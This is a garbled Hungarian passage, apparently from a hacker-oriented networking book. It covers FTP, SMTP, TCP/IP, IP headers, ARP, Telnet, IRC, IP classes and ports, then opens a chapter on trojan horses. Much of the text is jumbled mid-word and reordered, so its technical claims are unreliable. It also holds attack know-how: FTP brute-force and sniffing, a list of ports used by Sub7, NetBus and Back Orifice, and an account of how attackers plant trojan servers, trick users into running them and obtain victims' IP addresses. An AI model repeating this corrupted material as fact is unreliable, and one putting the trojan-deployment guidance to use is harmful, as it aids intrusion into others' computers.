átadja a teljes állomány utolsó adatait, a kliens vissza-Az átvitel végének ezeknek a fájloknak a fogadását. Most a szervergép Close bevezetése küld a kliensnek, amely veszi a parancsot, és elfogadja. 5. fázis: adateljárás mutatja a kontrolleljárásának (21. port) az átvi-Az átvitel bezárul. A kliens-adateljárás szintén terminál, a kontroli-lezárása azonban aktívan hagyja a további átvitelekhez.

iga

A paraméterként megadott könyvtárra vált. cd ~ Törli a New néven létrehozott könyvtárat. Is -l

er home-könyvtárára vált. Mkdir New

r New

ktuális könyvtárban található összes fájlt. chmod

elj

okat a fájlokhoz és/vagy könyvtárakhoz.

Az öt kommunikációs fázis az FTP-nél

rendelkezésre álló közel 60 parancsból itt csak a legfontosabk felsorolni:
indul az FTP-kapcsolat a hosthoz. open host Ha egy hosthoz még Ha már fennáll a

s

szükség, ahol lemez nélküli munkaállomásokat (diskless-workst tetnek, mert ezek nem tudják tárolni a logikai címüket. Bootolá tulajdonképpeni indítást értik, hanem csak a fontos konfiguráci telét.
SMTP

a felhasználó azonban már az FTP környezetben található, az open host , a felhasználó azonban még nincs bejelentkezve, a user paranccsal ASCII-re állítja az adatátviteli módot. binary Minden fájltranszfer után elhangzik egy Kapcsoló: ha a Kapcsoló: ha a cr be van kapcsolva (default), akkor a

elépíteni az említett kapcsolódást. user user

g. ascii

adatátviteli módot. bell

ED karakterek LINEFEED-re módosulnak. prompt

pcsolva (default), akkor több fájl átvitelénél minden fájl után egy interaktív

ezik.

A Simple Mail Transfer Protocol alighanem a legtöbbet haszn interneten. Az SMTP már a kezdet kezdetén a Unix-rendszer dett be, és időközben a normál PC-ken is megtalálta a helyét. A kezeli a mail-szoftverét, és itt készít elő egy üzenetet. Ha ezután netét, akkor ez annyi időre kerül a köztes tárba, amíg a TCP a (az OSI modell keretei között) átviszi. A kliensnek és a szervern parancs, illetve reakció áll a rendelkezésére, amelyeket most ne Helyette a szerver és a kliens közti kis párbeszédet mutatjuk be ver részéről mindig pozitív válaszból indulunk ki): • A kliens session-t épít fel a szerverhez. • A szerver megerősíti a szervizek rendelkezésre állását. • A kliens azonosítja magát. • A szerver azonosítja magát. • be. • A szerver a beleegyezését adja. • A kliens átküldi a címzettet. • A szerver válaszol: a postafiók elérhető. • A kliens inicializálja az adatátvitelt.

P-parancsok

k Transfer Protocol nem a TCP-re épül, mint az előbb tárgyalt UDP-re (User Datagram Protocol). Bár ez is adatok átvitelét m a végfelhasználó számára készült, mivel a kapcsolat biztosítatz átviteleknél nincsen jelszólekérdezés, csak a forrás-IP marad delkezésre álljon a szükséges tartomány. A legfontosabb parant, a mode, a get, a put, a verbose és a quit. néhány szó arról, hogyan is folyik itt az adatátvitel. A TFTP ens-szerver elvre épül. A kliens egy kérést küld a szervernek, az megkezdődik az adatátvitel. Minden adatrekord 512 bájtos, és a zza. A kliens akkor tételezi fel automatikusan az átvitel végét, ha rd 512 bájtnál rövidebb.

A kliens átadja a tulajdoképpeni parancsot, amely mail-k

• A szerver felveszi az adatokat, és a befejezéshez kéri a <crlf> csot.

• A kliens az átvitel befejezése után, ahogy megállapod <crlf><crlf> -et. • A kliens a megfelelő paranccsal befejezi a kapcsolatot. • A szerver erre service closing-gal felel.

ocol is az UDP-re (Use Datagram Protocol) épül, és tulajdonképpen ztették, hogy boot-folyamatokat aktiváljon. Erre csak ott van

Windowing-nak is nevezik. így a különböző számítótni.as években más mail-rendszereket is bevezettek. A TCP az egyik fő protokoll. Ez az eljárás egyébként yre nagyobb figyelmet vívott ki magának a nagyvállalatoknál és a nél. Az átmenetekkel nem volt könnyű megbirkózni. Transzport réteg A transzport rétegnek a következő feladatokat kell ellátnia: • A kapcsolatokat ellenőrzötten kell felépíteni és bezárni. Ez a rendszer. Ebben a hibael funkciói segítenek. hogy a fogadott adatok állapotban és sorrendben érkezzenek meg. egy multikomputerré olvadnak össze. s ez igazolja az átvitel tökéletességét. • Lehetővé tenni az adatátvitelt dedikált transzportkapcsolato Multiplexing: egy kommunikációs csatorna felépítése. Az RPC-vel a részfeladatokat specifikusan az kvalifikált számítógéphez lehet rendelni. A címzett minden fogadott csomagról egy ü feladónak. hibafelismerés és folyamatvezérlés a kapcsolat a rocedure Calls-t akkor használják. . A transzport rétegben két protokoll található. Transmission Control Protocol (TCP) Information Services műveletek biztonsági objektumok és elérési re szolgálnak. audió stb. lehetővé teszi a decentralizált userID-k. • Az adatfolyamok priorizálása. amelyet eredetileg a SUN fejleszYellow Pages volt a neve). ent egy számítógép. A NIS működtetéséhez a ponensekre van szükség: A TCP a következőkre képes: • Adatfolyam-átvitel • Virtuális full-duplex kapcsolatok • Adatfolyam-vezérlés • Hibafelismerés • Prioritásvezérlés atbázis egy túlméretezett /etc/passwd-fájlt jelenít meg a hálózat ster-Server a megfelelő domainekkel kezeli a NIS-adatbázist. 1992 óta nagyjából csak a purpose Internet Mail Extensions) használják. am egyidejű átvitelére lehet használni. amely nagyon nagy ásokat igényelne. kompatibilitási ek fel. vagyis az adatfolyam prioritá küldése. elszavak központi adminisztrációját. is át lehet küldeni vele. amely a szervertől kap adatokat. és olyan feladatot kell elvégezni. • Ellenőrzés. a már említ UDP (User Datagram Protocol). ha több különböző kapacitású szádelkezésre. és a protokoll-család más tagj valamennyi adat megbízható átvitelét garantálja. így nayes konvertereket kellett alkalmazni. gondoskodva arról. ve-Server az adatbázis egy biztonsági másolatát tartalmazza a erver kiesésének az esetére. amelyben azokat elkü dául minden elküldött csomaghoz egy numerikus értéket generá téknek a segítségével a két egymással összeköttetésben álló szám csomagot azonosít. hanem a legkülönbözőbb adattípusoka. A pontosabb felépítésébe itt nem megyünk bele. amely már nem ak a tiszta szövegküldésre. • Optimalizált adatfolyam . domain a NIS-adatbázisban leképezett számítógépek csoportja. de nem változtatni ezeket. a címzett ennek megfelelő üzenetet küld újrakéri az érintett csomagot. Ha egyszer még elő az adatátvitelben.

Az Internet Protocol egy headerből és az azt követő adatblok többek között az adatcsomagok fragmentálásáért is felelős. például: Internet Protocol (IP) ő számítógép. 64 K Identification: egy adatcsomag egyértelmű ismertetőjele. megerősítéssel válaszol. és a kapcsolat felépül. mint a TCP. hogy egy adatcsomag legfeljebb 65535 bájt méretű csomag ennél nagyobb. amely a TCP-nél említett tulajdonságok dicsekedhet. Ezt a bonyolult folyamatot megpróbáljuk egy header-mode megmagyarázni: Version Flags | HL Type of Service Fragment Offset TTL gram Protocol (UDP) Totál Length Indent ztosítatlan protokoll. illetve a TCP-vel. Hálózati réteg Ez a réteg különböző protokollokat fog össze. a TCP-re bízhatja a kapét. A Pre séget nyújt a vezérlőinformációk előnyben részesítésére. Type of Service: minden bitnek csak ajánlókaraktere van. Hogy ezt elkerüljék.s felügyeli. ot egy három részből álló folyamat vezeti be. az adatok hosszáról. kis táblázat példákat mutat arra. Az UDP azonban nem kéri a fogadás megerősítehát. az lefagyaszthatja a PC-t. hogy a TCP teljes felel a hírének. egy alkalmazáscsatoló-felület az IP-hez. En és a Source Address-nek a segítségével ismerhető fel a töredékad zósága. Totál Lenght: az adatcsomag teljes hossza bájtban (max. hogy milyen szolgáltatások érP-vel. a DoS-támadásokró ben többet mondunk. 53 161 SNMP 69 TFTP 25 SMTP 32 FTP 23 80 Protoco Header Checksum Source Address Destination Address Options Padding Data C DNS TELNET HTTP agram Protocol (UDP) Transmission Control Protocol (TCP) z UDP/TCP Version: az IP-verziót jelöli. amelyről később. Ezek és a két következő mező vezérlik a reassembly-t (ld . azás. hogy nem lépett-e fel súlyos hiba az adatátvitelben. verzióra. a csomagot részcso bolják. mondhatni. amiért az UDP li réteghez tartozik: az IP ugyan elő tud állítani kapcsolatokat. Az interneten pillanatnyilag m használják. amellyel a távoli számítógéphez. A roppant rövidre fogott: információkat tartalmaz a kiinduló rtról. illetve a szerverhez olódni. A elküldött csomagokat a célrendszerben újból egyesítik reassembly néven ismertebb. A f azt jelenti. IHL vagy HL (Internet Header Length): az IP-header hossza kokban van megadva. Ebből látszik. miszerint biztonságos átviteli protokoll. mint például az Internet Explorer. Ugyanúgy biztosítatlan. illetve a kliens elküldi a kapcsolatra irányuló ké egy portot. tud adatokat továbbítani az alkalmazásoknak. Az Internet Protocol felelős az adatcsomagok átviteléért a mennyi protokolljánál. és közli a UDP-header adatainak az t. amelyet three-wayneveznek. megerősítéssel és egy várakozási listával (a kapcsolathoz) válaszol. ha a célszámítógép egy bizonyos idő megerősítést a fogadásukról. Az UDP ezt a. Ezt nevezik p lásnak (Buffer Owerflow). amelyek aktíva az adatok átvitelében. mint azok a protokollok. nszportréteg alatti rétegek tartalmaznak. megnyitása után mindkét irányba áramolhatnak az adatok. Az ok. amelyet néh zatban (LAN) már használnak. azonban közeledik a váltás a 6. etben automatikusan megszakítja a kapcsolatot a másik számítólten átküldi az adatokat. ehhez persze még más fontos protokollokra is szükség van.

a host egy RARP-kérést küld a f amire azután a RARP-szerverek a hálózatban átnézik a saját refe taikat. Itt van feljegyezve a küldő száme. amelyek nem támogatják a álást. logikai c tárolni. és ezért mindig csak a fizikai cím ismeretével bootolnak . Ahelyett. • gments: hogy kiderüljön. Address: a célállomás internetcíme. és egy RARP-választ küldenek vissza. lően kell alakítani az ellenőrzőszámot. A felesleges késleltetések elkerülése érdekében a header ela korlátozódik. Reverse Address Resolution Protocol (RARP) ecksum: az IP-header ellenőrzőszáma. amely tartalmazza Ezt a módszert tulajdonképpen csak olyan számítógépeknél ha lyeknek nincs olyan adathordozójuk. ress: a forrásállomás internetcíme. Options: opcionális mező további információknak.bitnek a következő a jelentése: gment: olyan hostokhoz. A fontos ULP-k: Leírás ICMP (Internet Control Message Protocol) 3 TCP EGP UDP (User Loose Source Routing: a küldőállomás előír néhány közb • Strict Source Routing: a küldőállomás minden közbeeső állo • Timestamp Option: az IP-címe helyett. hogy tékre csökkenjen. minden továbbinál egy fragmezőjének a hosszával növekszik az érték. amelyet például az interneten talál meghajtó egymagában nem képes arra. mivel semmilyen módon nem áll összeköttetés hardvercímével. és kiosztja a fragAz első fragmentum offset O-t kap. Offset: egy adatcsomag adatbájtjait számozza. az internetprotokoll igazán komplex. Az opciók mindenekelőtt a hálózati bakeresést és a méréseket szolgálják. hogy bináris null re egészítse ki a frame-et. amelyben tartós. A legfontosabbak: • Record Route: naplózza az adatcsomag útját. Ez egy headerből és az ARP-csomagból áll. hogy a logikai címén számítógépet. meg kell delt ULP (Upper Layer Protocol) protokollt. és tartalmaz adatokat a logikai forrás-protokollcímhez és a fizikai címhez is. Mivel a TTL-érték (Time tleg a flag és a flag offset értékei is minden routernél változnak. Ezáltal teljesül a 1 6 bites ás. hogy hiányoznak-e töredékek. hogy egy adatcsomag minden umát fogadta-e. Sok kódot kiegészítésekhez terveztek. Ennek az értéknek a dja a címzett megállapítani. Itt van feljegyezve a fogadó címe. az lamikor el lesz távolítva a hálózatról. • Padding: kitöltő bitek. Mivel a különböző protokollok az IP-re támaszkodnak. A számítógépes kommunikációhoz azonban n nem logikai címet használnak. Mivel az időmérés meglematikus a hálózatban. címből állítaná elő a fizikait. akárcsak a record r den gateway a feldolgozás időpontját jegyzi be. és a headerben nincs feljegyezve indulási uter úgy dekrementálja (kicsinyíti) a csomagot átfutáskor. Tehát a logikai címet a fizikai címre kell cserél az ARP. de mindez az adatok átvitelét szolgálja. Mint látjuk. e (TTL): Minden csomagnak van egy előre megadott maximális mit itt lehet megadni. Routolási hibánál. A padding feladata. a firmware á niált fizikai címe. például huroknál. A RARP az ARP-vel ellenkező irányban működik. Ekkor a következő router már nem veszi fel. Address Resolution Protocol (ARP) -to-Gateway Protocol) 6 Control Protocol) 8 col) ay Protocol) 17 P-k Egy hálózatban minden számítógépnek van egy.

3. Kattintsunk a Kapcsolatra. Megjelenik egy pá 7. Most megjelenik: Welcome. és az adatok visszajönnek a számítógépre.de uest 18 ly iós üzeneteinek a listája • Csatlakozás: telnet • terminál típus: vt 100 8. 4. A Telnetet az RFC 854 (Request for Comment. A fő cél egy szabványos módszer létrehozás keken alapuló folyamatok összekötésére. A Telnet tehát lehetővé teszi a felhasználóknak. 4 -elterelés. amelyet az FTPlunk (ld. Ez ugyanaz a folya FTP-nél. 11. 12. Beírjuk a következőket: • Hostnév: meine-domain. hogy távoli s jelentkezzenek be az interneten. 3. például a hibaüzenetek közvetítése. amelyeket az ICMP küld: eírás estination unreachable: a célállomás nem érhető el. gra Windows alatt egy Telnet-kapcsolat a következők szerint épü eteinek listája az információs üzenetekről: 1. Kattintsunk az OK-ra.exe sort. protokolloknak a használata és a lehetséges biztonságosságuk telei a hackerek cselekményeinek. Ugyanaz IP-t. 11 Time exceeded: a timer puffer-erőforrások elhasználva. ány alkalmazás és protokoll használata és ztonságosságuk 9. 5. 10.1 A Telnet aüzenetekről. A szokásos módon tárcsázzunk be a szolgáltatónkhoz.ietf. Váltsunk vissza a Telnet-re. http://www. a Telneten keresztül programokat is el lehet rendszereken. Ezután nyomjuk le az Enter-t. ehhez a Telnet egy terminált szimulál (szöveg. az internetfejles kafeljegyzése. és készen áll. eírás cho reply 8 Time est 16 17 6. 8 bit/bájt-orie kációs lehetőséget nyújtani. Most a szerver a jelszót akarja tudni. és parancsokat hajtassanak végre mítógépeken. mintha maga is egy fölérendelt protokoll lenne.ontrol Message Protocol (ICMP) eladata az üzenetek.org/) a következőképpen defini protokoll célja egy általános. Windows 95/98 (és magasabb verzió) alatt kattintsunk a Sta mire megjelenik egy kis párbeszédablak. a Telnet elindul. Sőt.3. 2. 5 Paraméter Problem: Paraméter-probléma. a szerver üdvözöl. Ez az a név. Kattintsunk a Hálózati rendszer kapcsolatra. Adjuk meg a login-nevünket. azonban kotórésze. Gépeljük be a telnet. lejjebb). n megfelelően módosul. . mindkét irányra kiterjedő.

ubis2$. akkor a szerver hibakóddal válaszol. FTP ávoli rendszerek közötti adatátvitel egyik módszere. hogy minden adatot kódolatlan szövegként visz át. Az FTP-t az for Comments. lehet írni a parancsokat. ha beleolvas a omba.rtassuk magunkat. pl. Ha valak login-nevet ad meg. s különbözőképpen tá a legfontosabb támadási formák. elsősorban programokon keresztüli hasznáék. távoli számítógépek mplicit (programokon keresztüli) használatának az elősegítése. b3$ stb. mert általa a programok vagy a d minden internet-felhasználó számára elérhetők. és jelszóként egy e-mail-címet k zel az FTP-szerver nyilvános részéhez kapunk hozzáférést. FTP-szervernek. porton keresztül teszi fel. biztonsági kézikönyv) így mutatja be: Az FTP fel(programok és/vagy adatok) közhaszmú átvitele. mivel a szabvá cióban nincs korlátozás a jelszavak beírására. Ezt a támadást Brute Force-rohamnak is nevezik. a jelszó beírása ható. adatátvitel egy FTP kliensen keresztül történik. pcsolatban vagyunk a szerverrel. a szerek fájlrendszerei közötti strukturális különbségekből adódó vesződolása és 4. amit írunk. nagyon könnyen megszerezheti a fiókadatokat. Felépül a Telnet-kapcsolat A Telnettel az az egy gond van. adatok megbízható és hatékony átvitele. Jelszótámadások Az FTP igen alkalmas a jelszavak kipróbálására. Az Anonymus FTP-nél bárki bejelentkezhet a sze névként többnyire Anonymus-t. szervereknél ki lehet találni az érvényes login-neveket. ilyen például a y a WS_FTP. illetve FTP da futnia a célszámítógépen. egy betolakodó. Bár az FTP-t egy vetlenül is lehet használni. Mivel a Telnet felhasználóazonosítást kíván (loginnév. A kliens egy kérdést küld a távoli számítógép FTP Ezt a kérdést a 21. A parancssort lehet látni. amiért nem látjuk. Az FTP-nek két fajtája van: a User-FTP és az Anonymus-FTP nél a felhasználónak a login-nevével és a jelszavával kel bejentkeznie. 2. Az A fontos szolgáltatás az interneten. jelszó). Az FTP biztonsága Az FTP nem túl biztonságos protokoll. 3. Egy kapcsolat létrehozásához. . A CuteFTP felülete e még egyszer az Enter-t. tehát akárhányszor m a jelszót.

Erről a óló fejezetben további részleteket tudhatnak meg. Egy módon manipulált szoftvert helyezhet el a szerveren (vírus. pl.ripe. a trójaiaknál). A legismertebbek közé tartoznak hC és a pIRCh. A beszélgetésekhez ma már kliens valamelyikét használják. .ffing TP kódolatlan szövegként továbbítja az adatokat. Minden IP-cím 32 vel az ilyen számkombinációk igen körülményesek. 3. Az interneten rás egy egyértelmű számmal. szervertől függően (IRC szerver. hogy egy ügyfél a szolgáltatójától kapja ges IP-címet. eltöltés jelszófájlt.4 Az IP-címzés IRC ternet Relay Chat) az e-mail mellett az egyik legkedveltebb szolerneten. Eszerint egy IP-cím négy bájtból áll: 11000010 194 Pl: 11000010 128 1 1 1 0 0 0 1 01001101 77 64 01111100 124 16 32 8 4 álóan alkalmas a Social Engineering-re. De az IRC-parancsokból is sok információt tudhat me felhasználóról. A rosszul konfigurált kliensprog több elérést engednek meg a szervereknek a helyi erőforrásokra mint amennyi tanácsos volna.3. trójai). többnyire a p írásmódot használják. az IP Numbering Autho pában a RIPE (http://www. felhasználók. ahol mindig szívesen küldenek t rusokat (ld. A legnagyobb veszélyt azonban maguk ve a szerverprogramok jelentik. amelyeket a chat-en mondott nekik ajtsanak. Az IP-címek archikus. Többrésztvevős valós idejű konferenciákat tesz lehetővé. ha egy betörő lózati forgalmakba. felhasználói adatok birtokába juthat. miközben a hálózatok üzemeltetői időbeli kül. Egy támadó elküldetheti például e-mailben magának a Minden kvadráns egy 0 és 255 közti számot reprezentál.net/) felelős az IP-címek kiosz Hogyan néz ki egy IP-cím? A jelenleg használt IP-protokoll az IPv4. a szolgáltató megintcsak a hálózattól kölcsönz amelyre csatlakozik. erverre lehet Anonymus-belépéssel szoftvert feltölteni (upload). a bb csatornákon (channels) lehetnek. irc. íg szegmenssel elméletileg több mint négymilliárd (pontosan: 4 29 met lehet kezelni.euirc.net). Leginkább az újoncok vehogy bizonyos parancsokat. IRC-felület A címzés az interneten az IP-címzésen alapul. blokkokban kölcsönzik IP-címeiket. ami azt jelenti. amelynél a 32 bit 8 bitekre van felosztva. az IP-címmel érhető el. mális számként írják le. amelyek a segítségére lehetnek a további támadás veszélyt jelenthet a fájlcsere is.

x). Már ma is szűkösen megy a B. A C- címek kiadása. TCP/IP-installációk tesztelésére szolgálnak a számítógépe pinggel egy tetszőleges 127-es címre).168.oszt m kvadránsban megint a teljes értékterület tartozik 0-255-ig.x.x) negyedikről szabadon rendelkezhetnek (ez kiszámolva 256 különböző meghatározott hálózatot sem definiálnak és több cím biztosítják az adatcsomagok egyidejű átvitelét.x. A C-osztályú hálózatok első negyedében 192-223-ig vannak értékek.0 és x. Az A-osztályú hálózatokat azonban mára már mind kiosztották.255 Leírás Minden IP-címben a negyedik szegmensben a 0 és 255 érték szertől függően zárolva vannak.x.x-i intraneten belül lehet routolni. a 0 a subnet megnevezésé alatt a negyedik negyedben minden gépet értünk 1 -254-ig).és C. önállóan a hozzájuk utalt címtartományokat. 172.x.ccc. amelynek ez az első szegmense. 224. Leírás Az A-osztályú hálózatok az első negyedben 1 és 126 közötti értékeket A-osztályú hálózatok tulajdonosai az InterNIC-től (ami most is minden A- Címek x. Ezért van be állni. és a második negyedben van a 0-255-ig ékterület.x. amelyre információk tudnak bejön menni. és az IP-cím fennmaradó 24 bitjét at létesíteni az interneten. az InterNIC-től függetlenül.x255.x.x.x.bbb. amelyek.xx broadcast-címként szolgál (ezzel az értékkel érhető el egy subnet minden sz Minden IP-cím.x. így a négymilliárd elméletileg rendelkezésre álló IP-c már csak egy „töredéke" marad.x-ig 240.x gépei számára van fenntartva. 10.x-ig hálózaton belüli IP-címeket csak az intraneten belül lehet routolni. amely a 90-es évek elején átvette az elését. amelyet a szolgáltatók nem oszthatnak ki. az Ipv6 IP-címzési rendszer. szegmens észen kiosztva kapják.x. mivel a szabad számkészlet mindig kisebb lesz. C-osztályú hálózatokon 255. negyed értékek 224-239-ig a multicast-címe -191-ig vannak értékek.x.x. az egyes IP-címterek kezelését nemzeti NIC-eknek és knak adta át.255-ig routolni. ezér magyarázat következik.16.bbb. és a maradék 16 bitet adhatják ki maguk (ez 254-ig. ntesítés céljából az InterNIC. mert más célokat 3.168. egyetlen x.x internetre kapcsolódó intranet helyi gépei számára van fenntartva. internetre kapcsolódó intra-00192. amelyekben csak az első negyedet határozza meg egy ék háromnegyedet szabadon lehet kiadni. TCP/IP viss Ez az A-osztályú há hurokként szolgál.ti osztályok kiderült.x. hogy négymilliárd IP-címet nagyon nehezen tud egyetkezelni.x.bbb.31. aaa. A B-osztályú hálózatok tulajdonosai a két első negyedet 65536 különböző IP-címet jelent egy B-osztályú hálózaton belül). Így jöttek létre a hálózati osza. a 255 a negyed 127.x. és tok tulajdonosainak az első három szegmenst (aaa.x.4 Aportokról Ebben a könyvben gyakran találkozunk a port fogalmával. amelyben egy IP-cím a mostani 32 bit helyett 12 yú hálózatok Foglalt IP-címek -címek van. Néhány ilyen csatolófelületet biztosan minden felhasznál . x. Ezen az B-osztályú hálózat ugyancsak egy internetre kapcsolódó intranet 172.x. amely a további szövegek jobb megértésé A port egy csatolófelület.x239. 192. belüli IP-címeket csak az intraneten b Az 1.x A B-osztályú hálózatok első net helyi gépei számára van fennt k ki.x. Ezeket időnként D-osztálynak i A jövőbeli fejlesztésekhez zárolva vannak még az 1. gfelelően a négymilliárd IP-címet ismét három osztályba sorolés C-osztályú hálózatokba. E B-osztályú hálózatokon belüli IP-címeket cs Ez a 256 C-osztályú hálózat u ot kezel) kapják az első negyedet.

E-maileket például a Simple Mail Transfer TP)-on keresztül küldünk. Ha egy FTP szervert telepítünk a rendszerre.hackerzbook. A minollok megfelelő porthoz rendelésével kapcsolatos információkat teg tartalmazza. Ezért ajánlatos a rendszer gyakori vizsgálata egy el . Egy portszkennelés eredménye A következő táblázat néhány fontos portot ír le: Port 21 25 Leírás FTP (File Transfer Protocol) 23 Telnet (Service. ok/ról/on káros adatcsomagok.org/assignments/ numbers weboldalon található. Ezek a közkedvelt szervizeknek vannak fennzerint csak az arra jogosult felhasználók érhetik el őket. itt kérjük le a Netbios Name Service (hálózati PC-k nevei) 138 Netbios Datagramm Service (Adatforgalom a hálózatban) 139 Session Service (a nukerek is ezt használják) Netb A legfontosabb portok áttekintése Valamennyi port listája a http://www. A nagyobb portokat dinamikus vagy privát portoknak nevezik. tehát vannak a Linuxnak. a 25. akkor ez porton vár kérdésre. ortok komoly biztonsági hiányosságokat is jelentenek a rendszen a portokon keresztül az avatott hackerek be tudnak törni az szerbe. portszámról megy. Simple Mail Transfer Protocol) 43 SQL * Net (SQL Server Port) 79 (utánanézni. de rendszerint mindenki használhatja őket. Portjai minden olyan operációs rendszernek ly támogatja a TCP/IP-t. és az portok lezárása egy tűzfallal. . Ez a port bocsátja rendelkezésre a Webhez szükséges HTTP kommunikációs protokollt. Ezeket a portokat számokkal jelölik. használhatják. után a monitor vagy a nyomtató jelenti. hanem erportokról van szó. t portok az 1024-49151 portok.ilyen például a 7tf Sphere (www.iana. 5536 port van. Az 1-1023-ig portok a standard. illetve rossz szándékú támadások agy fogadhatók. Megfelelő védőmechanizmusok nélkül az ilyen bnyire a számítógép lefagyásához vezetnek. és gyakran bizonyos szervizekhez vezve. így pélő egy weboldal letöltésekor automatikusan kapcsolatot létesít a rver 80. errendszer szintén különféle portokat kínál az interneta különböző szolgáltatásokhoz. ez a port tehát nyitott. ha egy program ezen a porton egy kérésre (request). illetve statikus Well known portok. kié egy weboldal) 53 kereséséhez) 66 (World Wide Web) 110 jeinket 137 (információk egy felhasználóról. Itt azonban nem fizikai. s a megfelelő szolgramhibáira építenek. a Unixnak és a BeOs-nak is. számú portjával. kkor nyitott.de) -. désre vár.ik például az egér és a billentyűzet mint adatbeviteli eszközök. nem pr Domain Name Server (DNS nev Finger SMTP (mailküldéshez. A manipulált adatdéséhez általában adott portokat használnak. ezeket más aját készítésűek is. A mail-szolgáltatás ennek megfelelőwn portok szabványa szerint. például hogy vannak-e mail-jei) 80 POP3 (Post Office Protocol 3).

Port 2140 Throat 30129 Paradise 5400 12361 12345 Netbus 2 Pro 21544 Régi Back Orifice (BO) 1243 Régi Sub 7 27374 30100 Hackers Paradise Sub7 Netsphere 456 Trójai Deep Throat 6670 Deep Masters Blade Runner Whack A Mole 20034 Girlfriend Netbus 31337 Deep Throat 6771 A trójai portok Az összes ismert trójai portról a http://www.de címen kapunk pontos listát.A portokat a trójaiak is használják. . ezért most felsoroljuk a legismertebb trójaiak legfontosabb portjait.secure.un.

5 A lemezek majdnem ugyanígy működnek 4.3 Windows-Registry ez már izgalmas 4.3 Így álcázzák és terjesztik a trójaiakat 4.2 Álcázás a WinZip-pel 4.3.2.2 A történelmi minta.4.4 Módszerek az Explorer.6.3.3.7 Mit csinálnak a hobby-hackerek a trójaiakkal? 4.6.1 4. és vezérli a szervert 4.6 További terjesztési stratégiák 4.4 4.exe-vel a C:\ meghajtóra 4.Hálózati eszköz vagy támadás a Microsoft ellen 4.1 Vírus.2.3.2.3 Hogyan szerzik meg a hackerek az IP-t? 4.2 AutoRun bejegyzések 4.4.egy trójai rémisztő lehetőségekkel 4.3.1 A trójaiakat fájlokba integrálják 4.2 A kliens otthon marad.1 Támad a Sub7 BackOrifice 2K .Tartalom 4. Miből 4.1 A szerver kiosztása 4.5 4.6.és trójai-szkenner 4.5 A runonce.6 Sub7 .6.3 A trójaiakat az ICQ-val is tovább lehet adni 4.6.4 Elég egy CD és az automatikus lejátszás funkció 4.1 A BO2K és összetevői Így ismerjük fel a trójait a rendszerünkben 4.exe kicserélése áll egy trójai? .3.3.5. fejezet .

amelyről azt sem tudjuk. De a ló belseje a legerősebb és legbátrabb görög harcosokat rejtette.a hackerek pedig a magukévá tették a trójai faló ötletét. A hackernek meg kell kapnia a fertőzött PC aktuális IP-címét.1 A szerver kiosztása Ahhoz.2. hogy el is indítsa a szervert. Különböző műveleteket hajt végre. Ezután a görögök visszahúzódtak. De lehet egy olyan program is. 4. Az elérés csak akkor jöhet létre. A trójaiak a biztos győzelem tudatában bevontatták a lovat a városba. Erre a görögök évekig ostromolták eredménytelenül Trója városát. a trójaiak isteni jelképét. például a tudtunk nélkül jelszavakat lop vagy fájlokat másol.tehát az eredeti program megváltoztatása. vagyis egy keyboard logfájlt készít. Építtetett egy hatalmas falovat. Amikor látták. amely egy fájlba naplózza felhasználói beviteleket. A hacker ilyenkor többnyire a következő problémákkal szembesül: • A szervert el kell juttatni a felhasználóhoz. Úgy képzelhető el. hogy a számítógépünkre került.A trójaiak 4. ként működik. hogy ostrommal nem tudják bevenni. A legegyszerűbb formájában a trójai egyszerűen egy kémprogram lehet. hogy miből is áll egy trójai. az kiderül a továbbiakban a különböző trójai programok leírásából. akik azután éjszaka kimásztak a ló hasából.2 Miből áll egy trójai? Először is tudni kell. amelyekről a fertőzött rendszer felhasználója mit sem tud. Itt mutatkozik meg a trójaiak és a klasszikus távkarbantartó programok hasonlósága. mégis mérhetetlen károkat okozhat. amely lehetővé teszi az idegen számítógép „távirányítását". de az engedélyezetlen kódja alapján olyan funkciókat is elvégez. Csak akkor lehet egy (internetes vagy hálózati) kapcsolaton keresztül az IP-cím segítségével az idegen számítógépet elérni. ha a fertőzött számítógépet az IP-címén keresztül sikerül megszólítania. Trója elesett . Hogy a trójai eltitkolja az elhelyezését. azaz „rá kell sózni". a trójai király megszöktette a szépséges görög Helénát. akárcsak a görög katonák. Ez a kapcsolat manapság legegyszerűbben az interneten vagy egy hálózaton keresztül valósítható meg. Hogy az akciók lehetőségei milyenek lehetnek. telepíteni kell a szervert a cél-. amely látszólag hasznos funkciókat hajt végre. Mindig valami váratlant tesz. 4. amelyek távoli számítógépek hálózaton vagy telefonvonalon keresztüli kezelését teszik lehetővé. hogy a bevitt adatokat egy előre megadott e-mail-címre küldi a következő online-kapcsolatnál. a görög Odüsszeusznak támadt egy ötlete. illetve áldozat PC-re. A szerver a központi program. Azonban a trójai és a származási helye között minden esetben kapcsolatnak kell lennie. hogy a hacker megpróbálja elhelyezni vagyis „szórni" a szervert a célrendszereken. álcázást használ. Trójainak tehát egy szoftvert nevezünk. Jóval komplexebbek azok a programok. és kinyitották a város kapuit a görög seregnek. amelybe meg nem engedett kódot ágyaztak . Ez a tipikus feladata egy keylogger-nek. és önfeledten ünnepeltek. * A felhasználót rá kell venni arra. A trójai lehet egy hasznos program. hogy később egy klienssel célzottan érhesse el a kitelepített szervereket. amelyek nemcsak adatokat küldenek el. ha a szerver . hogy egy számítógép vagy annak az adatai elérhetővé váljanak. Még egy kicsit világosabban leírva: a trójai egy meg nem engedett kód egy legitim programon belül . amely információkat közvetít úgy. és Trója kapuja elé állíttatta.ilyenkor a program a trójai program hordozója- . hanem a számítógép távirányítását is lehetővé teszik. amely a város közelében rejtőzött. amely valami hasznosat vagy csak valami érdekeset csinál.mint program aktív. Az RFC 1244 (Site Security Handbook) így írja le a trójait (a szerző fordítása): Trójai lehet egy program. amelyekről a fertőzött rendszer felhasználójának nincsen tudomása.1 A történelmi minta Bizonyára mindenki ismeri a homéroszi történetet: Párizs.

tehát amikor fennáll a kapcsolat a fertőzött számítógéppel. mint pl. és ott beírjuk: netstat . aki ezzel elérést kapott. illetve az internetre lép. EzEgy másik lehetőség. megváltoztatta az Fpinget úgy. minden kapcsolódásnál egy másik. Az IP-címet a trójaitól és az eljárás módjától függően különböző utakon kapja meg a hacker: az ICQ-val történő elhelyezés esetén a következő kapcsolatnál közvetlenül lekérdezheti az áldozat aktuális IP-címét. a szerverfájl mindjárt el is indul. és a háttérben aktív legyen. Ehhez a legtöbb trójainak integrált szkenneré is van. a támadónak egy vezérlőprogramra is szüksége van. A szerver konfigurálásánál meg lehet határozni a klienshez küldés módjait és az akciós lehetőségeket is. Ha a szerver automatikus értesítésre van beállítva. az a támadótól függ. A kapcsolat könnyen felismerhető 4. Hogy hogyan használja ki ezt a veszélyes potenciált. hogy a fertőzött számítógép egyáltalán online-ban van-e. hogy a szerver az operációs rendszerrel együtt automatikusan elinduljon. A 